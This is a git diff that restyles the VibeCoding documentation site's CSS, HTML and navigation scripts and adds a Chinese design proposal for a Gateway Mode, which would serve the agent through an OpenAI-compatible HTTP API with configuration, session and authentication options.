@@ -99,57 +171,75 @@
             gap: 8px;
         }
 
-        .github-btn {
+        .btn {
             display: inline-flex;
             align-items: center;
-            gap: 8px;
-            padding: 6px 16px;
-            border: 1px solid rgba(255,255,255,0.5);
-            background: transparent;
-            color: var(--md-on-primary);
+            gap: 6px;
+            padding: 8px 16px;
+            border: 1px solid var(--border);
+            background: var(--surface);
+            color: var(--text-primary);
             cursor: pointer;
-            border-radius: 16px;
-            font-size: 14px;
+            border-radius: var(--radius-md);
+            font-size: 13px;
             font-weight: 500;
-            transition: all 0.2s;
-            font-family: 'Roboto', sans-serif;
+            transition: all var(--transition-fast);
+            font-family: inherit;
             text-decoration: none;
+            white-space: nowrap;
         }
 
-        .github-btn:hover {
-            background-color: rgba(255,255,255,0.15);
-            border-color: rgba(255,255,255,0.8);
+        .btn:hover {
+            background: var(--surface-hover);
+            border-color: var(--text-muted);
         }
 
-        .github-btn svg {
-            width: 18px;
-            height: 18px;
+        .btn svg {
+            width: 16px;
+            height: 16px;
             fill: currentColor;
         }
 
-        .lang-chip {
-            display: inline-flex;
-            align-items: center;
-            padding: 6px 16px;
-            border: 1px solid rgba(255,255,255,0.5);
+        .btn--primary {
+            background: var(--primary);
+            border-color: var(--primary);
+            color: var(--text-inverse);
+        }
+
+        .btn--primary:hover {
+            background: var(--primary-hover);
+            border-color: var(--primary-hover);
+        }
+
+        .lang-switcher {
+            display: flex;
+            background: var(--background-alt);
+            border-radius: var(--radius-md);
+            padding: 2px;
+            gap: 2px;
+        }
+
+        .lang-btn {
+            padding: 6px 12px;
+            border: none;
             background: transparent;
-            color: var(--md-on-primary);
+            color: var(--text-secondary);
             cursor: pointer;
-            border-radius: 16px;
-            font-size: 14px;
+            border-radius: var(--radius-sm);
+            font-size: 13px;
             font-weight: 500;
-            transition: all 0.2s;
-            font-family: 'Roboto', sans-serif;
+            transition: all var(--transition-fast);
+            font-family: inherit;
         }
 
-        .lang-chip:hover {
-            background-color: rgba(255,255,255,0.15);
-            border-color: rgba(255,255,255,0.8);
+        .lang-btn:hover {
+            color: var(--text-primary);
         }
 
-        .lang-chip.active {
-            background-color: rgba(255,255,255,0.2);
-            border-color: var(--md-on-primary);
+        .lang-btn.active {
+            background: var(--surface);
+            color: var(--text-primary);
+            box-shadow: var(--shadow-xs);
         }
 
         /* Layout */
@@ -159,68 +249,75 @@
             min-height: calc(100vh - var(--header-height));
         }
 
-        /* Sidebar / Navigation Drawer */
+        /* Sidebar */
         .nav-drawer {
             position: fixed;
             top: var(--header-height);
             left: 0;
             width: var(--sidebar-width);
             height: calc(100vh - var(--header-height));
-            background-color: var(--md-surface);
-            border-right: 1px solid var(--md-divider);
+            background-color: var(--surface);
+            border-right: 1px solid var(--border);
             overflow-y: auto;
             z-index: 900;
-            transition: transform 0.3s cubic-bezier(0.4, 0, 0.2, 1);
+            transition: transform var(--transition-slow);
         }
 
         .nav-drawer__header {
-            padding: 16px;
-            border-bottom: 1px solid var(--md-divider);
+            padding: 20px 16px 12px;
+            border-bottom: 1px solid var(--border-light);
         }
 
         .nav-drawer__title {
-            font-size: 14px;
-            font-weight: 500;
-            color: var(--md-on-surface-medium);
+            font-size: 11px;
+            font-weight: 600;
+            color: var(--text-muted);
             text-transform: uppercase;
             letter-spacing: 0.08em;
         }
 
         .nav-drawer__list {
             list-style: none;
-            padding: 8px 0;
+            padding: 8px;
         }
 
         .nav-drawer__item {
             display: flex;
             align-items: center;
-            padding: 12px 16px;
-            color: var(--md-on-surface);
+            padding: 10px 12px;
+            color: var(--text-secondary);
             text-decoration: none;
             cursor: pointer;
-            transition: background-color 0.2s;
+            transition: all var(--transition-fast);
             font-size: 14px;
             font-weight: 400;
+            border-radius: var(--radius-md);
+            margin-bottom: 2px;
         }
 
         .nav-drawer__item:hover {
-            background-color: rgba(0, 0, 0, 0.04);
+            background-color: var(--surface-hover);
+            color: var(--text-primary);
         }
 
         .nav-drawer__item.active {
-            background-color: var(--md-primary-light);
-            color: var(--md-primary);
+            background-color: var(--primary-light);
+            color: var(--primary);
             font-weight: 500;
         }
 
-        .nav-drawer__item .material-icons {
-            margin-right: 16px;
+        .nav-drawer__item .material-icons-outlined {
+            margin-right: 12px;
             font-size: 20px;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
         }
 
-        .nav-drawer__item.active .material-icons {
-            color: var(--md-primary);
+        .nav-drawer__item:hover .material-icons-outlined {
+            color: var(--text-secondary);
+        }
+
+        .nav-drawer__item.active .material-icons-outlined {
+            color: var(--primary);
         }
 
         /* Main Content */
@@ -228,88 +325,94 @@
             flex: 1;
             width: calc(100% - var(--sidebar-width));
             margin-left: var(--sidebar-width);
-            padding: 32px 48px;
-            max-width: min(1600px, 100% - var(--sidebar-width));
+            padding: 32px;
+            max-width: calc(var(--content-max-width) + var(--sidebar-width) + 64px);
         }
 
         .content-card {
-            background-color: var(--md-surface);
-            border-radius: var(--md-radius);
-            box-shadow: var(--md-shadow-1);
-            padding: 32px;
+            background-color: var(--surface);
+            border-radius: var(--radius-lg);
+            border: 1px solid var(--border);
+            padding: 40px;
             min-height: 400px;
+            max-width: var(--content-max-width);
         }
 
         /* Markdown Styles */
         .content-card h1 {
-            font-size: 28px;
-            font-weight: 500;
-            color: var(--md-on-surface);
+            font-size: 32px;
+            font-weight: 700;
+            color: var(--text-primary);
             margin-bottom: 24px;
             padding-bottom: 16px;
-            border-bottom: 1px solid var(--md-divider);
-            letter-spacing: 0.02em;
+            border-bottom: 2px solid var(--border);
+            letter-spacing: -0.02em;
+            line-height: 1.2;
         }
 
         .content-card h2 {
-            font-size: 22px;
-            font-weight: 500;
-            color: var(--md-on-surface);
-            margin: 32px 0 16px;
+            font-size: 24px;
+            font-weight: 600;
+            color: var(--text-primary);
+            margin: 40px 0 16px;
             padding-bottom: 8px;
-            border-bottom: 1px solid var(--md-divider);
-            letter-spacing: 0.02em;
+            border-bottom: 1px solid var(--border);
+            letter-spacing: -0.01em;
         }
 
         .content-card h3 {
-            font-size: 18px;
-            font-weight: 500;
-            color: var(--md-on-surface);
-            margin: 24px 0 12px;
+            font-size: 20px;
+            font-weight: 600;
+            color: var(--text-primary);
+            margin: 32px 0 12px;
         }
 
         .content-card h4 {
             font-size: 16px;
-            font-weight: 500;
-            color: var(--md-on-surface-medium);
-            margin: 20px 0 8px;
+            font-weight: 600;
+            color: var(--text-secondary);
+            margin: 24px 0 8px;
         }
 
         .content-card p {
-            font-size: 14px;
-            line-height: 1.8;
+            font-size: 15px;
+            line-height: 1.75;
             margin-bottom: 16px;
-            color: var(--md-on-surface);
+            color: var(--text-secondary);
         }
 
         .content-card a {
-            color: var(--md-primary);
+            color: var(--primary);
             text-decoration: none;
             font-weight: 500;
+            transition: color var(--transition-fast);
         }
 
         .content-card a:hover {
+            color: var(--primary-hover);
             text-decoration: underline;
         }
 
         .content-card code {
-            font-family: 'Roboto Mono', monospace;
-            background-color: #F5F5F5;
+            font-family: 'JetBrains Mono', 'Fira Code', monospace;
+            background-color: var(--background-alt);
             padding: 2px 6px;
-            border-radius: 3px;
+            border-radius: var(--radius-sm);
             font-size: 13px;
-            color: var(--md-error);
+            color: var(--accent);
+            border: 1px solid var(--border-light);
         }
 
         .content-card pre {
-            background-color: #263238;
-            color: #ECEFF1;
-            padding: 16px;
-            border-radius: var(--md-radius);
+            background-color: #1e293b;
+            color: #e2e8f0;
+            padding: 20px;
+            border-radius: var(--radius-lg);
             overflow-x: auto;
-            margin-bottom: 16px;
+            margin-bottom: 20px;
             font-size: 13px;
-            line-height: 1.6;
+            line-height: 1.7;
+            border: 1px solid #334155;
         }
 
         .content-card pre code {
@@ -317,59 +420,99 @@
             color: inherit;
             padding: 0;
             font-size: inherit;
+            border: none;
         }
 
+        /* Syntax highlighting colors */
+        .content-card pre .keyword { color: #c084fc; }
+        .content-card pre .string { color: #86efac; }
+        .content-card pre .comment { color: #64748b; font-style: italic; }
+        .content-card pre .function { color: #60a5fa; }
+        .content-card pre .number { color: #fbbf24; }
+
         .content-card ul, .content-card ol {
             margin-bottom: 16px;
             padding-left: 24px;
         }
 
         .content-card li {
-            font-size: 14px;
-            line-height: 1.8;
-            margin-bottom: 4px;
+            font-size: 15px;
+            line-height: 1.75;
+            margin-bottom: 6px;
+            color: var(--text-secondary);
+        }
+
+        .content-card li::marker {
+            color: var(--text-muted);
         }
 
         .content-card table {
             width: 100%;
             border-collapse: collapse;
-            margin-bottom: 16px;
+            margin-bottom: 20px;
             font-size: 14px;
+            border-radius: var(--radius-lg);
+            overflow: hidden;
+            border: 1px solid var(--border);
         }
 
         .content-card th, .content-card td {
-            border: 1px solid var(--md-divider);
             padding: 12px 16px;
             text-align: left;
+            border-bottom: 1px solid var(--border);
         }
 
         .content-card th {
-            background-color: #FAFAFA;
-            font-weight: 500;
-            color: var(--md-on-surface);
+            background-color: var(--background-alt);
+            font-weight: 600;
+            color: var(--text-primary);
+            font-size: 13px;
+            text-transform: uppercase;
+            letter-spacing: 0.04em;
         }
 
-        .content-card tr:hover {
-            background-color: #F5F5F5;
+        .content-card td {
+            color: var(--text-secondary);
+        }
+
+        .content-card tr:hover td {
+            background-color: var(--surface-hover);
+        }
+
+        .content-card tr:last-child td {
+            border-bottom: none;
         }
 
         .content-card blockquote {
-            border-left: 4px solid var(--md-primary);
-            padding: 12px 16px;
-            margin: 16px 0;
-            background-color: #E3F2FD;
-            color: var(--md-on-surface);
+            border-left: 4px solid var(--primary);
+            padding: 16px 20px;
+            margin: 20px 0;
+            background-color: var(--primary-light);
+            border-radius: 0 var(--radius-md) var(--radius-md) 0;
+            color: var(--text-primary);
             font-size: 14px;
         }
 
+        .content-card blockquote p {
+            margin-bottom: 0;
+            color: inherit;
+        }
+
         .content-card hr {
             border: none;
-            border-top: 1px solid var(--md-divider);
-            margin: 24px 0;
+            border-top: 1px solid var(--border);
+            margin: 32px 0;
         }
 
         .content-card strong {
-            font-weight: 500;
+            font-weight: 600;
+            color: var(--text-primary);
+        }
+
+        .content-card img {
+            max-width: 100%;
+            border-radius: var(--radius-md);
+            margin: 16px 0;
         }
 
         /* Loading & Error States */
@@ -379,16 +522,16 @@
             align-items: center;
             justify-content: center;
             padding: 80px 0;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
         }
 
         .loading-spinner {
             width: 40px;
             height: 40px;
-            border: 3px solid var(--md-divider);
-            border-top-color: var(--md-primary);
+            border: 3px solid var(--border);
+            border-top-color: var(--primary);
             border-radius: 50%;
-            animation: spin 1s linear infinite;
+            animation: spin 0.8s linear infinite;
             margin-bottom: 16px;
         }
 
@@ -398,42 +541,44 @@
 
         .error-state {
             padding: 24px;
-            background-color: #FFEBEE;
-            border-radius: var(--md-radius);
-            color: var(--md-error);
+            background-color: var(--error-light);
+            border-radius: var(--radius-lg);
+            border: 1px solid var(--error);
         }
 
         .error-state h3 {
             font-size: 18px;
-            font-weight: 500;
+            font-weight: 600;
             margin-bottom: 8px;
-            color: var(--md-error);
+            color: var(--error);
         }
 
         .error-state p {
             font-size: 14px;
-            color: #B71C1C;
+            color: var(--error);
             margin-bottom: 0;
         }
 
-        /* Snackbar */
-        .snackbar {
+        /* Toast */
+        .toast {
             position: fixed;
             bottom: 24px;
             left: 50%;
             transform: translateX(-50%) translateY(100px);
-            background-color: #323232;
-            color: white;
-            padding: 14px 24px;
-            border-radius: var(--md-radius);
-            box-shadow: var(--md-shadow-3);
+            background-color: var(--text-primary);
+            color: var(--text-inverse);
+            padding: 12px 24px;
+            border-radius: var(--radius-lg);
+            box-shadow: var(--shadow-xl);
             font-size: 14px;
             z-index: 2000;
             opacity: 0;
-            transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
+            transition: all var(--transition-slow);
+            max-width: 400px;
+            text-align: center;
         }
 
-        .snackbar.show {
+        .toast.show {
             transform: translateX(-50%) translateY(0);
             opacity: 1;
         }
@@ -441,10 +586,11 @@
         /* Footer */
         .footer {
             margin-left: var(--sidebar-width);
-            padding: 24px 48px;
+            padding: 24px 32px;
             text-align: center;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
             font-size: 12px;
+            border-top: 1px solid var(--border);
         }
 
         /* Overlay for mobile */
@@ -457,6 +603,7 @@
             bottom: 0;
             background-color: rgba(0,0,0,0.5);
             z-index: 850;
+            backdrop-filter: blur(4px);
         }
 
         .overlay.active {
@@ -466,7 +613,11 @@
         /* Responsive */
         @media (max-width: 1024px) {
             .main-content {
-                padding: 24px 32px;
+                padding: 24px;
+            }
+            
+            .content-card {
+                padding: 32px;
             }
         }
 
@@ -481,16 +632,18 @@
 
             .nav-drawer.open {
                 transform: translateX(0);
-                box-shadow: var(--md-shadow-4);
+                box-shadow: var(--shadow-xl);
             }
 
             .main-content {
                 margin-left: 0;
                 padding: 16px;
+                max-width: 100%;
             }
 
             .content-card {
-                padding: 24px 16px;
+                padding: 24px 20px;
+                border-radius: var(--radius-md);
             }
 
             .footer {
@@ -498,15 +651,23 @@
                 padding: 16px;
             }
 
-            .github-btn {
+            .btn {
                 padding: 6px 12px;
                 font-size: 12px;
             }
 
-            .github-btn svg {
+            .btn svg {
                 width: 14px;
                 height: 14px;
             }
+
+            .app-bar__title {
+                font-size: 16px;
+            }
+
+            .lang-switcher {
+                display: none;
+            }
         }
 
         /* Scrollbar */
@@ -519,12 +680,29 @@
         }
 
         .nav-drawer::-webkit-scrollbar-thumb {
-            background-color: var(--md-on-surface-disabled);
+            background-color: var(--text-disabled);
             border-radius: 3px;
         }
 
         .nav-drawer::-webkit-scrollbar-thumb:hover {
-            background-color: var(--md-on-surface-medium);
+            background-color: var(--text-muted);
+        }
+
+        /* Selection */
+        ::selection {
+            background-color: var(--primary-light);
+            color: var(--primary-dark);
+        }
+
+        /* Focus styles */
+        :focus-visible {
+            outline: 2px solid var(--primary);
+            outline-offset: 2px;
+        }
+
+        /* Smooth scrolling */
+        html {
+            scroll-behavior: smooth;
         }
     </style>
 </head>
@@ -532,21 +710,23 @@
     <!-- App Bar -->
     <header class="app-bar">
         <button class="app-bar__menu" onclick="toggleDrawer()" aria-label="Menu">
-            <span class="material-icons">menu</span>
+            <span class="material-icons-outlined">menu</span>
         </button>
         <span class="app-bar__title">
             <img src="assets/logo.svg" alt="VibeCoding" class="app-bar__logo">
-            VibeCoding Documentation
+            VibeCoding Docs
         </span>
         <div class="app-bar__actions">
-            <a href="https://github.com/startvibecoding/vibecoding" target="_blank" rel="noopener noreferrer" class="github-btn">
+            <a href="https://github.com/startvibecoding/vibecoding" target="_blank" rel="noopener noreferrer" class="btn">
                 <svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                     <path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/>
                 </svg>
                 GitHub
             </a>
-            <button class="lang-chip active" onclick="switchLanguage('en')">English</button>
-            <button class="lang-chip" onclick="switchLanguage('zh')">中文</button>
+            <div class="lang-switcher">
+                <button class="lang-btn active" onclick="switchLanguage('en')">EN</button>
+                <button class="lang-btn" onclick="switchLanguage('zh')">中文</button>
+            </div>
         </div>
     </header>
 
@@ -581,8 +761,8 @@
         <p>&copy; 2026-2027 VibeCoding. All rights reserved.</p>
     </footer>
 
-    <!-- Snackbar -->
-    <div class="snackbar" id="snackbar"></div>
+    <!-- Toast -->
+    <div class="toast" id="toast"></div>
 
     <script>
         // Configuration
@@ -592,14 +772,19 @@
                 items: [
                     { id: 'README', icon: 'home', title: 'Home' },
                     { id: 'getting-started', icon: 'rocket_launch', title: 'Quick Start' },
+                    { id: 'scenarios', icon: 'movie_creation', title: 'Scenarios' },
                     { id: 'cli-reference', icon: 'terminal', title: 'CLI Reference' },
                     { id: 'configuration', icon: 'settings', title: 'Configuration' },
+                    { id: 'hermes', icon: 'forum', title: 'Hermes Mode' },
+                    { id: 'a2a', icon: 'hub', title: 'A2A Protocol' },
                     { id: 'architecture', icon: 'architecture', title: 'Architecture' },
                     { id: 'tools', icon: 'build', title: 'Tools' },
                     { id: 'skills', icon: 'psychology', title: 'Skills' },
+                    { id: 'skillhub', icon: 'store', title: 'Skill Marketplace' },
                     { id: 'security', icon: 'security', title: 'Security' },
                     { id: 'acp', icon: 'extension', title: 'ACP / IDE' },
-                    { id: 'sessions', icon: 'forum', title: 'Sessions' },
+                    { id: 'gateway', icon: 'dns', title: 'Gateway Mode' },
+                    { id: 'sessions', icon: 'chat', title: 'Sessions' },
                     { id: 'sdk', icon: 'integration_instructions', title: 'SDK & Sub-Agents' },
                     { id: 'development', icon: 'code', title: 'Development' },
                     { id: 'faq', icon: 'help_outline', title: 'FAQ' },
@@ -611,14 +796,19 @@
                 items: [
                     { id: 'README', icon: 'home', title: '文档首页' },
                     { id: 'getting-started', icon: 'rocket_launch', title: '快速入门' },
+                    { id: 'scenarios', icon: 'movie_creation', title: '场景演示' },
                     { id: 'cli-reference', icon: 'terminal', title: '命令行参考' },
                     { id: 'configuration', icon: 'settings', title: '配置详解' },
+                    { id: 'hermes', icon: 'forum', title: 'Hermes 模式' },
+                    { id: 'a2a', icon: 'hub', title: 'A2A 协议' },
                     { id: 'architecture', icon: 'architecture', title: '系统架构' },
                     { id: 'tools', icon: 'build', title: '工具系统' },
                     { id: 'skills', icon: 'psychology', title: '技能系统' },
+                    { id: 'skillhub', icon: 'store', title: '在线Skill市场' },
                     { id: 'security', icon: 'security', title: '安全与沙箱' },
                     { id: 'acp', icon: 'extension', title: 'ACP / IDE 集成' },
-                    { id: 'sessions', icon: 'forum', title: '会话管理' },
+                    { id: 'gateway', icon: 'dns', title: 'Gateway 模式' },
+                    { id: 'sessions', icon: 'chat', title: '会话管理' },
                     { id: 'sdk', icon: 'integration_instructions', title: 'SDK 与子 Agent' },
                     { id: 'development', icon: 'code', title: '开发指南' },
                     { id: 'faq', icon: 'help_outline', title: '常见问题' },
@@ -632,7 +822,7 @@
 
         // Hash Router
         function getHashRoute() {
-            const hash = window.location.hash.slice(1); // Remove #
+            const hash = window.location.hash.slice(1);
             if (!hash) return null;
 
             const parts = hash.split('/').filter(Boolean);
@@ -656,7 +846,7 @@
                     currentLanguage = route.lang;
                     updateLanguageButtons();
                 }
-                loadDocument(route.doc, false); // false = don't update hash again
+                loadDocument(route.doc, false);
             }
         }
 
@@ -673,7 +863,7 @@
                     <a class="nav-drawer__item ${item.id === currentDoc ? 'active' : ''}" 
                        data-doc="${item.id}"
                        onclick="navigateTo('${item.id}')">
-                        <span class="material-icons">${item.icon}</span>
+                        <span class="material-icons-outlined">${item.icon}</span>
                         <span>${item.title}</span>
                     </a>
                 </li>
@@ -702,23 +892,16 @@
                 contentDiv.innerHTML = marked.parse(text);
                 currentDoc = docId;
 
-                // Update hash
                 if (updateHash) {
                     setHashRoute(currentLanguage, docId);
                 }
 
-                // Update active state
                 document.querySelectorAll('.nav-drawer__item').forEach(item => {
                     item.classList.toggle('active', item.getAttribute('data-doc') === docId);
                 });
 
-                // Handle internal links
                 handleInternalLinks();
-
-                // Scroll to top
-                window.scrollTo(0, 0);
-
-                // Close mobile drawer
+                window.scrollTo({ top: 0, behavior: 'smooth' });
                 closeDrawer();
 
             } catch (error) {
@@ -754,12 +937,12 @@ <h3>Error Loading Document</h3>
             updateLanguageButtons();
             updateNavigation();
             loadDocument(currentDoc, true);
-            showSnackbar(lang === 'en' ? 'Switched to English' : '已切换到中文');
+            showToast(lang === 'en' ? 'Switched to English' : '已切换到中文');
         }
 
         function updateLanguageButtons() {
-            document.querySelectorAll('.lang-chip').forEach(btn => {
-                const btnLang = btn.textContent === 'English' ? 'en' : 'zh';
+            document.querySelectorAll('.lang-btn').forEach(btn => {
+                const btnLang = btn.textContent === 'EN' ? 'en' : 'zh';
                 btn.classList.toggle('active', btnLang === currentLanguage);
             });
         }
@@ -779,19 +962,18 @@ <h3>Error Loading Document</h3>
             overlay.classList.remove('active');
         }
 
-        // Snackbar
-        function showSnackbar(message) {
-            const snackbar = document.getElementById('snackbar');
-            snackbar.textContent = message;
-            snackbar.classList.add('show');
+        // Toast
+        function showToast(message) {
+            const toast = document.getElementById('toast');
+            toast.textContent = message;
+            toast.classList.add('show');
             setTimeout(() => {
-                snackbar.classList.remove('show');
+                toast.classList.remove('show');
             }, 3000);
         }
 
         // Initialize
         document.addEventListener('DOMContentLoaded', () => {
-            // Check hash route first
             const route = getHashRoute();
             if (route && DOCS[route.lang]) {
                 currentLanguage = route.lang;
@@ -800,9 +982,8 @@ <h3>Error Loading Document</h3>
 
             updateLanguageButtons();
             updateNavigation();
-            loadDocument(currentDoc, !route); // Only update hash if no initial route
+            loadDocument(currentDoc, !route);
 
-            // Listen for hash changes
             window.addEventListener('hashchange', handleHashChange);
         });
     </script>
diff --git a/docs/cache-optimization.md b/docs/proposal/cache-optimization.md
similarity index 100%
rename from docs/cache-optimization.md
rename to docs/proposal/cache-optimization.md
diff --git a/docs/proposal/gateway-proposal.md b/docs/proposal/gateway-proposal.md
new file mode 100644
index 0000000..e159321
--- /dev/null
+++ b/docs/proposal/gateway-proposal.md
@@ -0,0 +1,873 @@
+# Gateway Mode 方案设计
+
+> 状态: 已确认 (Approved) — v0.1.26 全部新增功能
+> 日期: 2026-05-28
+> 版本: v0.1.26
+
+## 1. 概述
+
+Gateway 模式将 VibeCoding 作为一个 HTTP 服务启动，对外暴露**标准 OpenAI Chat Completions API** (`/v1/chat/completions`)。
+任何兼容 OpenAI SDK 的客户端（Cursor、Continue、Open WebUI、自定义脚本等）都可以直接接入，
+后端实际由 VibeCoding agent 完成推理 + tool use 循环，对调用方完全透明。
+
+### 核心特性
+
+| 特性 | 说明 |
+|------|------|
+| **OpenAI 兼容 API** | 支持 `/v1/chat/completions`（streaming & non-streaming）和 `/v1/models` |
+| **多 Session** | 默认支持，每个请求可通过 header / body 关联 session，也可自动创建 |
+| **Sub-Agent 能力** | 可选开启（配置 `enableSubAgents: true`），复用现有 multi-agent 体系 |
+| **Bearer Token 认证** | 基于 `Authorization: Bearer <token>` header，配置文件控制，默认关闭 |
+| **独立配置文件** | `gateway.json`，与 `settings.json` 同目录 (`~/.vibecoding/`) |
+
+## 2. 启动方式
+
+```bash
+# 启动 gateway（默认 :8080）
+vibecoding gateway
+
+# 指定端口
+vibecoding gateway --port 9090
+
+# 指定 provider/model（覆盖 settings.json 默认值）
+vibecoding gateway --provider deepseek-openai --model deepseek-v4-flash
+
+# 指定默认工作目录
+vibecoding gateway --work-dir /home/user/projects
+
+# 指定配置文件路径
+vibecoding gateway --config /path/to/gateway.json
+
+# 启用 sub-agent
+vibecoding gateway --multi-agent
+
+# 启用 sandbox
+vibecoding gateway --sandbox
+
+# 启用 debug
+vibecoding gateway --debug --verbose
+```
+
+### 初始化配置文件
+
+```bash
+# 创建 gateway.json 模板（写入 ~/.vibecoding/gateway.json）
+vibecoding --init-gateway
+
+# 如果文件已存在，不覆盖，提示用户
+vibecoding --init-gateway
+# → gateway.json already exists: ~/.vibecoding/gateway.json
+
+# 强制覆盖
+vibecoding --init-gateway --force
+```
+
+`--init-gateway` 是 root command 的 flag（不是 gateway 子命令的），因为用户可能在还没有配置文件时就想生成模板。
+
+CLI 实现为 `rootCmd.AddCommand(gatewayCmd)`，与现有 `acp` 子命令平级。
+
+## 3. 配置文件
+
+### 3.1 路径
+
+`gateway.json` 位于 `config.ConfigDir()` （通常 `~/.vibecoding/gateway.json`），与 `settings.json` 同目录。
+
+### 3.2 Schema
+
+```jsonc
+{
+  // 监听地址
+  "listen": ":8080",
+
+  // 认证配置 - 默认关闭
+  "auth": {
+    "enabled": false,
+    // tokens 列表 - 任一匹配即通过
+    "tokens": [
+      "sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
+    ]
+  },
+
+  // 默认 mode（可被每个请求覆盖）
+  "defaultMode": "yolo",
+
+  // 默认 thinking level
+  "defaultThinkingLevel": "medium",
+
+  // 是否启用 sub-agent 能力
+  "enableSubAgents": false,
+
+  // Sandbox 配置
+  "sandbox": {
+    // 是否启用 sandbox（也可通过 --sandbox flag 开启）
+    "enabled": false,
+    // sandbox level: "none", "standard", "strict"
+    // 为空时根据 mode 自动推导：yolo→none, agent→standard, plan→strict
+    "level": ""
+    // 其他 sandbox 细节（allowedRead, deniedPaths 等）继承 settings.json 中的 sandbox 配置
+  },
+
+  // 工作目录安全
+  "allowedWorkDirs": [
+    // 允许请求级 x_working_dir 切换到的目录白名单
+    // 支持前缀匹配："/home/user/projects" 匹配 "/home/user/projects/foo"
+    // 为空 [] 表示仅允许使用 workingDir 默认值，禁止请求级切换
+    // 不设置此字段（null）则不做校验
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  // session 管理
+  "session": {
+    // session 空闲超时（秒），超时后自动清理。0 = 不超时
+    "idleTimeoutSeconds": 1800,
+    // 最大并发 session 数。0 = 不限制
+    "maxSessions": 0
+  },
+
+  // 默认工作目录 — agent 执行 tool 时的 cwd
+  // 为空时 fallback 到 gateway 进程的 cwd
+  "workingDir": "/home/user/projects",
+
+  // 跨域配置
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  // Provider/Model 覆盖（不设置则使用 settings.json 中的默认值）
+  "provider": "",
+  "model": "",
+
+  // Tool 可见性
+  "toolVisibility": {
+    // "content": 通过 content 字段发送 tool 状态信息（默认）
+    // "sse_event": 通过扩展 SSE event 发送（event: tool_status，不兼容标准 OpenAI SDK）
+    // "none": 不发送任何 tool 状态信息
+    "mode": "content"
+  },
+
+  // System prompt 处理策略
+  // "append": 客户端 system message 追加到内置 system prompt 末尾（默认）
+  // "ignore": 忽略客户端 system message
+  "systemPromptMode": "append",
+
+  // 请求超时（秒）— agent 执行的最大时长
+  // streaming 模式下只要有数据流动就不超时
+  "requestTimeoutSeconds": 1800,
+
+  // 全局并发限制（0 = 不限制）
+  "maxConcurrentRequests": 0,
+
+  // 日志级别
+  "logLevel": "info"  // "debug", "info", "warn", "error"
+}
+```
+
+### 3.3 配置加载优先级
+
+1. 请求级 `x_working_dir` / `x_mode`（仅部分字段）
+2. CLI flags（`--port`, `--multi-agent`, `--work-dir` 等）
+3. `gateway.json`
+4. `settings.json` 中的默认 provider/model/mode
+5. 进程 cwd（workingDir 最终 fallback）
+
+## 4. API 设计
+
+### 4.1 POST /v1/chat/completions
+
+**请求格式**（标准 OpenAI）:
+
+```jsonc
+{
+  "model": "deepseek-v4-flash",  // 可选，覆盖默认 model
+  "messages": [
+    {"role": "system", "content": "You are a helpful assistant."},
+    {"role": "user", "content": "Read the file main.go and explain it."}
+  ],
+  "stream": true,                // 支持 true/false
+  "temperature": 0.7,            // 透传给后端 provider
+  "max_tokens": 4096,            // 透传
+
+  // VibeCoding 扩展字段（可选）
+  "x_session_id": "sess-abc123",  // 关联已有 session
+  "x_mode": "yolo",               // 覆盖 mode
+  "x_working_dir": "/home/user/project"  // 覆盖工作目录
+}
+```
+
+**Non-streaming 响应**:
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [
+    {
+      "index": 0,
+      "message": {
+        "role": "assistant",
+        "content": "Here is the explanation of main.go..."
+      },
+      "finish_reason": "stop"
+    }
+  ],
+  "usage": {
+    "prompt_tokens": 1234,
+    "completion_tokens": 567,
+    "total_tokens": 1801
+  },
+  "x_session_id": "sess-abc123",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**Streaming 响应**（SSE）:
+
+```
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{"role":"assistant","content":"Here"},"finish_reason":null}]}
+
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{"content":" is"},"finish_reason":null}]}
+
+...
+
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{},"finish_reason":"stop"}],"usage":{"prompt_tokens":1234,"completion_tokens":567,"total_tokens":1801}}
+
+data: [DONE]
+```
+
+### 4.2 GET /v1/models
+
+返回当前 provider 可用的模型列表：
+
+```json
+{
+  "object": "list",
+  "data": [
+    {
+      "id": "deepseek-v4-flash",
+      "object": "model",
+      "created": 1716883200,
+      "owned_by": "vibecoding"
+    }
+  ]
+}
+```
+
+### 4.3 GET /health
+
+健康检查端点（无需认证）：
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+### 4.4 Session 管理端点（扩展，可选）
+
+```
+POST   /v1/vibecoding/sessions          创建 session
+GET    /v1/vibecoding/sessions           列出 session
+GET    /v1/vibecoding/sessions/:id       获取 session 详情
+DELETE /v1/vibecoding/sessions/:id       删除 session
+```
+
